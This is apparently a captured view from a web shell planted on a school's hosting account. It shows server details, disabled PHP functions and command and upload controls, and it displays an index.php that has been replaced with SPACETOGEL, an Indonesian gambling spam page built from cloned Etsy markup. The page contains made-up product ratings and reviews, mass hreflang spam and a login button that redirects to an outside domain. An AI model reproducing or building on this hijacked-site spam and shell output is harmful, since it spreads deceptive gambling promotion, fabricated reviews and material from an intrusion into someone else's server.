MMCT TEAM
Server IP : 2a02:4780:11:1359:0:1d43:a566:2  /  Your IP : 216.73.216.60
Web Server : LiteSpeed
System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u490972518 ( 490972518)
PHP Version : 5.6.40
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u490972518/domains/ppschool.org.in/public_html/stella/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u490972518/domains/ppschool.org.in/public_html/stella/index.php


<!DOCTYPE html>
<html lang="en-US"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="https://www.facebook.com/2008/fbml">
    <head>
        <script>if (window.performance && performance.mark) performance.mark("TTP")</script>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta http-equiv="content-language" content="en-ID">

        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="pinterest" content="nosearch">

        <meta name="csrf_nonce" content="3:1757443933:h3mNc4ckq3t2W3lUIwJ4ng47mPQt:8a416649e0e75d267ae855f66eed361ff1967f7d806ceb0850e1da0ce950a3ba">
        <meta name="uaid_nonce" content="3:1757443933:y6IRaUq1O7KIFfqDjKuVNvcfAysZ:e9f728fdc47b6a20961f8aef4d6743cf20348efc7ecb9616fd788cfe816da6a4">

        <meta property="fb:app_id" content="89186614300">

        <meta name="css_dist_path" content="/ac/sasquatch/css/" />
        <meta name="dist" content="202509091757442671" />


        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
    !function(e){var r=e.__etsy_logging={};r.errorQueue=[],e.onerror=function(e,o,t,n,s){r.errorQueue.push([e,o,t,n,s])},r.firedEvents=[];r.perf={e:[],t:!1,MARK_MEASURE_PREFIX:"_etsy_mark_measure_",prefixMarkMeasure:function(e){return"_etsy_mark_measure_"+e}},e.PerformanceObserver&&(r.perf.o=new PerformanceObserver((function(e){r.perf.e=r.perf.e.concat(e.getEntries())})),r.perf.o.observe({entryTypes:["element","navigation","longtask","paint","mark","measure","resource","layout-shift"]}));var o=[];r.eventpipe={q:o,logEvent:function(e){o.push(e)},logEventImmediately:function(e){o.push(e)}};var t=!(Object.assign&&Object.values&&Object.fromEntries&&e.Promise&&Promise.prototype.finally&&e.NodeList&&NodeList.prototype.forEach),n=!!e.CefSharp||!!e.__pw_resume,s=!e.PerformanceObserver||!PerformanceObserver.supportedEntryTypes||0===PerformanceObserver.supportedEntryTypes.length,a=!e.navigator||!e.navigator.sendBeacon,p=t||n,u=[];t&&u.push("fp"),s&&u.push("fo"),a&&u.push("fb"),n&&u.push("fg"),r.bots={isBot:p,botCheck:u}}(window);
</script>

        <link rel="stylesheet" href="https://hellblaze.biz/css/settings-overlay.746c61f69b1398.css" type="text/css" />
        <link rel="stylesheet" href="https://hellblaze.biz/css/view.32fb07f3620cc2.css" type="text/css" />
        <link rel="preload" href="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" as="image" />
        <script>
    //todo: this is from https://stackoverflow.com/questions/5525071/how-to-wait-until-an-element-exists (with updates
    // for prettier) and is duplicated in Transcend-Integration.ts. Ideally we would find a place both
    // files could call.
    function waitForElm(selector) {
        return new Promise((resolve) => {
            if (document.querySelector(selector)) {
                return resolve(document.querySelector(selector));
            }

            const observer = new MutationObserver(() => {
                if (document.querySelector(selector)) {
                    observer.disconnect();
                    resolve(document.querySelector(selector));
                }
            });

            // If you get "parameter 1 is not of type 'Node'" error, see https://stackoverflow.com/a/77855838/492336
            observer.observe(document.body, {
                childList: true,
                subtree: true,
            });
        });
    }
    function retryLoadingAirgap(loadAsync, attemptNumber) {
        var element = document.createElement("script");
        element.type = "text/javascript";
        element.src = "https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js";
        if (loadAsync) {
            element.setAttribute('data-cfasync', true);
            element.async = true;
        }

        element.onerror = (error) => {
            if (attemptNumber < 3) {
                window.__etsy_logging.eventpipe.logEvent({
                        event_name: `transcend_cmp_airgap_preliminary_failure`,
                    airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
                    airgap_bundle: 'control_bundle',
                    error: error,
                    retryAttempt: attemptNumber,
                    attemptWasAsyncLoad: loadAsync
                });
                retryLoadingAirgap(false, attemptNumber + 1);
            }
            else {
                try {
                    //ideally we would have the same STATSD here as in transcend-integration.ts
                    //but we can't import STATSD into mustache files.  This only occurs 0.02% of the time anyway and
                    //this should work, so tracking in the "happy case" in the ts file should be sufficient.
                    window.initializePrivacySettingsManager(false);
                }
                catch (error) {
                        waitForElm("#privacy-settings-manager-load-complete").then(()=> {
                            window.initializePrivacySettingsManager(false);
                        });
                }
                // Update privacy footer based on Airgap info after footer script is loaded.
                waitForElm("#footer-script-loaded").then(()=> {
                    window.updatePrivacySettingsFooterTextBasedOnRegime();
                });

                window.__etsy_logging.eventpipe.logEvent({
                    event_name: `transcend_cmp_airgap_load_failure`,
                    airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
                    airgap_bundle: 'control_bundle',
                    error: error,
                    retryAttempts: attemptNumber
                });
            }
        }

        var head = document.getElementsByTagName('head')[0];
        head.appendChild(element);
    }

    function handleErrorLoadingAirgap() {
        window.__etsy_logging.eventpipe.logEvent({
            event_name: `transcend_cmp_airgap_preliminary_failure`,
            airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
            airgap_bundle: 'control_bundle',
            retryAttempt: 1,
            attemptWasAsyncLoad: true
        });

        retryLoadingAirgap(true, 2);
    }
</script>

<script data-cfasync="true" data-ui="off" src="https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js" onerror="(function() { handleErrorLoadingAirgap(); })()"  async></script>

        

        <title>SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia</title>
        <meta name="description" content="Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional.">

            <meta name="robots" content="max-image-preview:large">



<!-- PRODUCT -->
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Product",
  "url": "https://ppschool.org.in/stella/",
  "name": "SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia",
  "sku": "4302118744",
  "description": "SPACETOGEL adalah tempat bermain Toto Macau dan togel 4D yang fokus pada akses cepat, hasil akurat, dan pengalaman bermain yang benar-benar nyaman. Dengan sistem yang stabil dan transparan, SPACETOGEL jadi pilihan aman buat pemain yang mencari situs terpercaya dan hasil yang bisa diandalkan setiap hari.",
  "image": [
    {
      "@type": "ImageObject",
      "author": "SPACETOGEL",
      "contentUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg",
      "thumbnailUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
    }
  ],
  "category": "Toto Macau < Togel 4D < SPACETOGEL",
  "brand": {
    "@type": "Brand",
    "name": "SPACETOGEL",
    "logo": "https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png"
  },
  "logo": "https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png",
  "aggregateRating": {
    "@type": "AggregateRating",
    "ratingValue": 4.9,
    "reviewCount": 62595
  },
  "offers": {
    "@type": "AggregateOffer",
    "offerCount": 952,
    "lowPrice": 258621,
    "highPrice": 494253,
    "priceCurrency": "IDR",
    "availability": "https://schema.org/InStock",
    "shippingDetails": {
      "@type": "OfferShippingDetails",
      "shippingOrigin": {
        "@type": "DefinedRegion",
        "addressCountry": "ID"
      }
    }
  },
  "review": [
    {
      "@type": "Review",
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": 5,
        "bestRating": 5
      },
      "datePublished": "2025-09-14",
      "reviewBody": "Main di SPACETOGEL kerasa lebih tenang, aksesnya lancar dan result-nya jelas. Cocok buat yang cari Toto Macau dan togel 4D serius tapi tetap santai.",
      "author": {
        "@type": "Person",
        "name": "SPACETOGEL Member"
      }
    },
    {
      "@type": "Review",
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": 5,
        "bestRating": 5
      },
      "datePublished": "2025-09-14",
      "reviewBody": "Tampilan SPACETOGEL enak dilihat, fitur lengkap, dan bonus hariannya bikin main jadi lebih seru. Akses Toto Macau dan togel 4D juga gampang banget.",
      "author": {
        "@type": "Person",
        "name": "SPACETOGEL User"
      }
    }
  ]
}
</script>

<!-- VIDEOOBJECT -->
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "VideoObject",
  "name": "SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia",
  "description": "SPACETOGEL adalah platform untuk Toto Macau dan togel 4D yang mengutamakan akses cepat, hasil akurat, dan pengalaman bermain yang stabil serta nyaman untuk pemain.",
  "thumbnailUrl": [
    "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg",
    "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
  ],
  "uploadDate": "2024-09-28T04:19:10-04:00",
  "duration": "PT18S",
  "contentUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
}
</script>

<!-- BREADCRUMB -->
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position": 1,
      "name": "Home",
      "item": "https://ppschool.org.in/stella/"
    }
  ]
}
</script>

<!-- ORG + WEBSITE + APP (@graph) -->
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@graph": [
    {
      "@type": "Organization",
      "@id": "https://ppschool.org.in/stella/#org",
      "name": "SPACETOGEL",
      "url": "https://ppschool.org.in/stella/",
      "logo": "https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png"
    },
    {
      "@type": "WebSite",
      "@id": "https://ppschool.org.in/stella/#website",
      "url": "https://ppschool.org.in/stella/",
      "name": "SPACETOGEL",
      "publisher": { "@id": "https://ppschool.org.in/stella/#org" },
      "inLanguage": "id-ID",
      "potentialAction": {
        "@type": "SearchAction",
        "target": "https://ppschool.org.in/stella/?s={search_term_string}",
        "query-input": "required name=search_term_string"
      }
    },
    {
      "@type": "SoftwareApplication",
      "@id": "https://ppschool.org.in/stella/#app",
      "name": "SPACETOGEL",
      "applicationCategory": "GameApplication",
      "operatingSystem": "Android, iOS, Windows",
      "offers": { 
        "@type": "Offer", 
        "price": "0", 
        "priceCurrency": "IDR" 
      }
    }
  ]
}
</script>



        <meta name="twitter:site" content="@SPACETOGEL" value="" /><meta name="twitter:card" content="summary_large_image" value="" /><meta name="twitter:app:name:iphone" content="SPACETOGEL" value="" /><meta name="twitter:app:url:iphone" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:iphone" content="477128284" value="" /><meta name="twitter:app:name:ipad" content="SPACETOGEL" value="" /><meta name="twitter:app:url:ipad" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:ipad" content="477128284" value="" /><meta name="twitter:app:name:googleplay" content="SPACETOGEL" value="" /><meta name="twitter:app:url:googleplay" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:googleplay" content="com.etsy.android" value="" />
<meta property="og:title" content="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia" />
<meta property="og:description" content="Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional." />
<meta property="og:type" content="product" /><meta property="og:url" content="https://ppschool.org.in/stella/" /><meta property="og:image" content="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" /><meta property="product:price:amount" content="22.50" /><meta property="product:price:currency" content="GBP" />

        

        <meta property="al:ios:url" content="etsy://listing/4302118744?ref=applinks_ios" /><meta property="al:ios:app_store_id" content="477128284" /><meta property="al:ios:app_name" content="SPACETOGEL" /><meta property="al:android:url" content="etsy://listing/4302118744?ref=applinks_android" /><meta property="al:android:package" content="com.etsy.android" /><meta property="al:android:app_name" content="SPACETOGEL" />

        <link rel="preconnect" href="//i.etsystatic.com" crossorigin="anonymous" /><link rel="preconnect" href="//i.etsystatic.com" /><link rel="preconnect" href="//v.etsystatic.com" /><link rel="preconnect" href="//v.etsystatic.com" crossorigin="anonymous" /><link rel="preload" as="image" imagesrcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" fetchpriority="high" />


            <link rel="canonical" href="https://ppschool.org.in/stella/" />
            <link rel="amphtml" href="https://megapegwan.com/manufka/" />
<link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="en" /><link rel="alternate" href="https://ppschool.org.in/stella/fi-en/" hreflang="en-FI" /><link rel="alternate" href="https://ppschool.org.in/stella/au/" hreflang="en-AU" /><link rel="alternate" href="https://ppschool.org.in/stella/ca/" hreflang="en-CA" /><link rel="alternate" href="https://ppschool.org.in/stella/dk-en/" hreflang="en-DK" /><link rel="alternate" href="https://ppschool.org.in/stella/hk-en/" hreflang="en-HK" /><link rel="alternate" href="https://ppschool.org.in/stella/ie/" hreflang="en-IE" /><link rel="alternate" href="https://ppschool.org.in/stella/il-en/" hreflang="en-IL" /><link rel="alternate" href="https://ppschool.org.in/stella/in-en/" hreflang="en-IN" /><link rel="alternate" href="https://ppschool.org.in/stella/nz/" hreflang="en-NZ" /><link rel="alternate" href="https://ppschool.org.in/stella/no-en/" hreflang="en-NO" /><link rel="alternate" href="https://ppschool.org.in/stella/se-en/" hreflang="en-SE" /><link rel="alternate" href="https://ppschool.org.in/stella/sg-en/" hreflang="en-SG" /><link rel="alternate" href="https://ppschool.org.in/stella/uk/" hreflang="en-GB" /><link rel="alternate" href="https://ppschool.org.in/stella/de/" hreflang="de" /><link rel="alternate" href="https://ppschool.org.in/stella/at/" hreflang="de-AT" /><link rel="alternate" href="https://ppschool.org.in/stella/ch/" hreflang="de-CH" /><link rel="alternate" href="https://ppschool.org.in/stella/fr/" hreflang="fr" /><link rel="alternate" href="https://ppschool.org.in/stella/ca-fr/" hreflang="fr-CA" /><link rel="alternate" href="https://ppschool.org.in/stella/nl/" hreflang="nl" /><link rel="alternate" href="https://ppschool.org.in/stella/be/" hreflang="nl-BE" /><link rel="alternate" href="https://ppschool.org.in/stella/it/" hreflang="it" /><link rel="alternate" href="https://ppschool.org.in/stella/es/" hreflang="es" /><link rel="alternate" href="https://ppschool.org.in/stella/mx/" hreflang="es-MX" /><link rel="alternate" href="https://ppschool.org.in/stella/jp/" hreflang="ja" /><link rel="alternate" href="https://ppschool.org.in/stella/pl/" hreflang="pl" /><link rel="alternate" href="https://ppschool.org.in/stella/pt/" hreflang="pt" /><link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="x-default" /><link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="en-US" />

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">__webpack_public_path__ = "https://www.etsy.com/ac/evergreenVendor/js/en-US/";</script>

        <link rel="shortcut icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" /><link rel="icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" type="image/webp" sizes="32x32" /><link rel="icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" type="image/webp" sizes="16x16" /><link rel="apple-touch-icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" sizes="180x180" /><link rel="mask-icon" href="/images/safari-pinned-tab.svg" color="rgb(241, 100, 30)" /><link rel="manifest" href="/site.webmanifest" />
<meta name="apple-mobile-web-app-title" content="SPACETOGEL" /><meta name="application-name" content="SPACETOGEL" /><meta name="msapplication-TileColor" content="#F1641E" /><meta name="theme-color" content="rgb(255, 255, 255)" />

        <link type="application/opensearchdescription+xml" rel="search" href="/osdd.php" title="SPACETOGEL"/>
    </head>
    <body class="ui-toolkit transitional-wide etsy-has-it-design is-responsive no-touch en-US IDR ID"
        data-language="en-US"
        data-currency="IDR"
        data-region="ID"
        
    >

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
    !function(a,b,c,d,e,f){a.ddjskey=e;a.ddoptions=f||null;var m=b.createElement(c),n=b.getElementsByTagName(c)[0];m.async=1,m.defer=1,m.src=d,n.parentNode.insertBefore(m,n)}(window,document,"script","https://www.etsy.com/include/tags.js", "D013AA612AB2224D03B2318D0F5B19", {
        endpoint:"https://www.etsy.com/include/tags.js",
        ajaxListenerPath: true,
        enableTagEvents: true,
        overrideAbortFetch: true,
        abortAsyncOnChallengeDisplay: true,
        disableAutoRefreshOnCaptchaPassed: false,
        replayAfterChallenge: true
    });

    var DD_BLOCKED_EVENT_NAME = "dd_blocked";
    var DD_RESPONSE_DISPLAYED_EVENT_NAME = "dd_response_displayed";
    var DD_RESPONSE_ERROR_EVENT_NAME = "dd_response_error";

    window.addEventListener(DD_RESPONSE_DISPLAYED_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_RESPONSE_DISPLAYED_EVENT_NAME, true);
        }
    });

    window.addEventListener(DD_BLOCKED_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_BLOCKED_EVENT_NAME, true);
        }
    });

    window.addEventListener(DD_RESPONSE_ERROR_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_RESPONSE_ERROR_EVENT_NAME, true);
        }
    });
</script>

        

        

        <div data-above-header class="wt-z-index-5 wt-position-relative">
            
            

        </div>

        <div data-selector="header-cat-nav-wrapper" data-menu-ui="menubar">
<div id="gnav-header" class=" gnav-header global-nav v2-toolkit-gnav-header wt-z-index-6 wt-bg-white wt-position-relative " data-as-version="10_12672349415_19" data-count-ajax data-show-suggested-searches-in-as="1" data-show-gift-card-cta-in-as="1" data-as-personalized="1" data-as-extras="{&amp;quot;expt&amp;quot;:&amp;quot;all_xml&amp;quot;,&amp;quot;lang&amp;quot;:&amp;quot;en-US&amp;quot;,&amp;quot;extras&amp;quot;:[]}" data-cheact="1" data-gnav-header>
    <header id="gnav-header-inner" class="global-enhancements-header wt-display-flex-xs wt-justify-content-space-between wt-align-items-center wt-width-full wt-body-max-width wt-pl-xs-2 wt-pr-xs-2 wt-pl-lg-6 wt-pr-lg-6 wt-bb-xs wt-bb-lg-none gnav-header-inner wt-pt-lg-2 
        
        "
        role="banner">
<script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
!function(e){
    var r=e.__etsy_logging;
    if(r && r.perf && r.perf.prefixMarkMeasure){
        var n=r.perf.prefixMarkMeasure("logo_render");
        e.performance && e.performance.mark && e.requestAnimationFrame(function(){
            setTimeout(function(){
                e.performance.mark(n)
            })
        })
    }
}(window);
</script>
<div class="wt-pb-lg-0 wt-pt-sm-1 wt-pt-lg-0 wt-pr-xs-0 wt-pr-sm-1" data-header-logo-container>
    <a href="/?ref=lgo" elementtiming="ux-global-nav">
        <span class="wt-screen-reader-only">SPACETOGEL</span>
    <img 
        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1749040413/ChatGPT_Image_4_Jun_2025__19.22.09-removebg-preview_e0khpu.png" 
        alt="SPACETOGEL Logo" 
        class="logo-dimensions wt-display-block wt-nudge-r-3 wt-nudge-t-1" 
        style="max-height:80px; height:auto;">
    </a>
</div>

            <nav class="wt-hide-xs wt-show-lg">
                <div data-clg-id="WtMenu" class="wt-menu wt-tooltip ge-menu--body-below-trigger wt-tooltip--disabled-touch dropdown-category-menu wt-menu--bottom wt-menu--left" data-wt-menu data-wt-tooltip="true" data-menu-body-below-trigger="true" data-close-on-select="true" data-hide-trigger-on-open="false" data-animate-in="true" data-contain-focus="false" data-open-direction-vert="bottom" data-open-direction-horiz="left" data-open-direction-force="true" data-menu-type="action">
       
        <button
          type="button"
          class="wt-menu__trigger wt-btn wt-btn--transparent header-button wt-mr-xs-1 wt-btn--small"
          aria-haspopup="true"
          aria-expanded="false"
          data-wt-menu-trigger
          data-level="0"
          data-overlay-trigger-selector= "overlay-trigger-ele"
        >
          <span class="etsy-icon wt-mr-xs-1 wt-icon--smaller">
            <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" viewBox="0 0 18 18">
              <rect x="2" y="8"  width="14" height="2"/>
              <rect x="2" y="13" width="14" height="2"/>
              <rect x="2" y="3"  width="14" height="2"/>
            </svg>
          </span>
          Categories
        </button>

        <div data-neu-spec-placeholder="1" id="bd2c69bf978c5288825b3623782eb9a1">
    <script type="text/json" data-neu-spec-placeholder-data="1">{"spec_name":"SPACETOGEL\\Modules\\CategoryNav\\Specs\\DropdownCatNav\\DropdownSubmenu","args":[]}</script>
    <div>
    
        
</div>
</div>

        <span class="ge-menu__body-caret wt-z-index-10 wt-bg-white wt-position-absolute wt-bl-xs wt-bt-xs wt-br-xs-none wt-bb-xs-none"></span>

</div>
            </nav>

        <div class="wt-width-full wt-display-flex-xs wt-pr-lg-3 wt-flex-lg-1 order-mobile-tablet-2" data-hamburger-search-container>
            <button
          data-id="hamburger"
          class="wt-btn wt-btn--transparent wt-btn--icon wt-hide-lg
               wt-btn--transparent-flush-left
                         wt-mb-xs-2
               
               wt-mb-lg-0
               header-button"
          aria-controls="mobile-catnav-overlay"
          tab-index="0"
     >
          <span class="wt-screen-reader-only">
                    Browse
          </span>
          <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M21 7H3V5h18zm-5 6H3v-2h13zm5 6H3v-2h18z"/></svg></span>
     </button>
            <div class="wt-display-inline-block wt-flex-xs-1 wt-pl-lg-0
                wt-mb-xs-2
        
        wt-mb-lg-0">
    <form id="gnav-search"
          class="global-enhancements-search-nav wt-position-relative wt-display-flex-xs"
          method="GET"
          action="/search.php"
          role="search"
          data-gnav-search
          data-ge-search-clearable
          data-trending-searches="1">

        <label for="global-enhancements-search-query" class="wt-label wt-screen-reader-only">
   Search for items or shops
</label>
<div 
    class="search-container"
    data-id="search-bar"
>
    <div
        class="wt-input-btn-group global-enhancements-search-input-btn-group emphasized_search_bar emphasized_search_bar_grey_bg search-bar-container"
        data-id="search-suggestions-trigger"
    >
        <input id="global-enhancements-search-query"
            data-id="search-query"
            data-search-input
            type="text"
            name="search_query"
            class="wt-input wt-input-btn-group__input global-enhancements-search-input-btn-group__input
                    wt-pr-xs-7
                                        
                    "
            placeholder="Search for SPACETOGEL"
            value=""
            autocomplete="off"
            autocorrect="off"
            autocapitalize="off"
            role="combobox"
            aria-autocomplete="both"
            aria-controls="global-enhancements-search-suggestions"
            aria-expanded="false"
        />
        <button type="button" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small position-absolute-important wt-position-right wt-z-index-9 wt-animated  wt-animated--is-hidden
            
            search-close-btn-margin-right " data-search-close-btn>
            <span class="wt-screen-reader-only">Clear search</span>
            <span class="wt-icon wt-icon--smaller wt-nudge-t-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
        </button>
        <button
            type="submit"
            class="wt-input-btn-group__btn global-enhancements-search-input-btn-group__btn
                
                "
            value="Search"
            aria-label="Search"
        data-id="gnav-search-submit-button">
            
            <span class="wt-icon wt-nudge-b-2 wt-nudge-r-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M10.5 19a8.46 8.46 0 0 0 5.262-1.824l4.865 4.864 1.414-1.414-4.865-4.865A8.5 8.5 0 1 0 10.5 19m0-2a6.5 6.5 0 1 0 0-13 6.5 6.5 0 0 0 0 13"/></svg></span>
        </button>
    </div>
    <div id="global-enhancements-search-suggestions"
        class="global-nav-menu__body
            search-suggestions-container
             wt-width-full wt-max-width-full
            "
         data-id="search-suggestions">
    </div>
</div>

<input id="search-js-router-enabled" type="hidden" value="true" />
<input type="hidden" value="all" name="search_type" id="search-type" />
    </form>
</div>
        </div>
        <a 
    data-selector="skip-to-content-marketplace"
    class="global-enhancements-skip-to-content wt-screen-reader-only wt-focusable" 
    href="#content"
>
    <div id="skip-to-content-wrapper" class="wt-display-flex-xs wt-align-items-center wt-justify-content-center wt-body-max-width wt-width-full wt-height-full wt-position-absolute wt-position-top wt-position-left wt-position-right wt-bg-denim wt-z-index-10">
        <label class="wt-btn wt-btn--transparent wt-btn--light">
            Skip to Content
        </label>
    </div>
</a>

        

        <div
            class="mobile-catnav-wrapper wt-overlay wt-overlay--peek wt-overlay--peek-left wt-p-xs-0"
            data-wt-overlay
            id="mobile-catnav-overlay"
            aria-hidden="true"
            aria-modal="false"
            role="dialog"
            
        >
        </div>

        <div class="wt-flex-shrink-xs-0" data-primary-nav-container>
            <nav aria-label="Main">
    <ul class="wt-display-flex-xs wt-justify-content-space-between wt-list-unstyled wt-m-xs-0 wt-align-items-center">
        <li>
    <button class="wt-btn wt-btn--small wt-btn--transparent wt-mr-xs-1 header-button"
        onclick="window.location.href='https://megapegwan.com/manufka/'">
  Login
</button>
</li>


<li 
    data-favorites-nav-container 
    data-ge-nav-menu="favorites"
    data-ge-hover-event-name="gnav_hover_favorites_menu"
>
    <span class="wt-tooltip wt-tooltip--disabled-touch" data-wt-tooltip>
        <a href="/guest/favorites?ref=hdr-fav" class="wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon reduced-margin-xs header-button"
           data-favorites-nav-link
           aria-labelledby="ge-tooltip-label-favorites">
            <span class="etsy-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.877 12.52q.081-.115.147-.239A6 6 0 0 0 12 4.528a6 6 0 0 0-9.024 7.753q.066.123.147.24l.673.961a6 6 0 0 0 .789.915L12 21.422l7.415-7.025q.44-.418.789-.915zm-14.916.425L12 18.667l6.04-5.722q.293-.279.525-.61l.673-.961a.3.3 0 0 0 .044-.087 4 4 0 1 0-7.268-2.619v.003L12 8.667l-.013.004v-.002l-.006-.064a3.98 3.98 0 0 0-1.232-2.51 4 4 0 0 0-6.031 5.193q.014.045.044.086l.673.961a4 4 0 0 0 .526.61"/></svg></span>
        </a>

        <span id="ge-tooltip-label-favorites" role="tooltip" data-favorites-label-tooltip>Favorites</span>
    </span>
</li>
<li data-gift-mode-nav-container>
    <span class="wt-tooltip wt-tooltip--disabled-touch" data-wt-tooltip>
        <a href="/gift-mode?ref=gm_utility_nav"
           class=" wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon reduced-margin-xs header-button"
           data-gift-mode-nav-link
           aria-labelledby="ge-tooltip-label-gift-mode">
            <span class="etsy-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M5.535 7A4 4 0 0 1 12 2.354 4 4 0 0 1 18.465 7H22v9h-1v6H3v-6H2V7zm9.466 0H13V5a2 2 0 1 1 2.001 2M11 5a2 2 0 1 0-2.001 2H11zm-.764 4c-.55.614-1.348 1-2.236 1v2a4.98 4.98 0 0 0 3-1v3H4V9zM13 11c.836.628 1.874 1 3 1v-2a3 3 0 0 1-2.236-1H20v5h-7zm-8 5v4h6v-4zm8 4v-4h6v4z"/></svg></span>
        </a>

        <span id="ge-tooltip-label-gift-mode" role="tooltip" data-registry-label-tooltip>
            
                Gifts
            
        </span>
    </span>
</li>
<li 
    data-ge-nav-menu="cart"
    data-ge-hover-event-name="gnav_hover_cart_menu"
>
    <span class="wt-tooltip wt-tooltip--bottom-left wt-tooltip--disabled-touch" data-wt-tooltip data-header-cart-button>
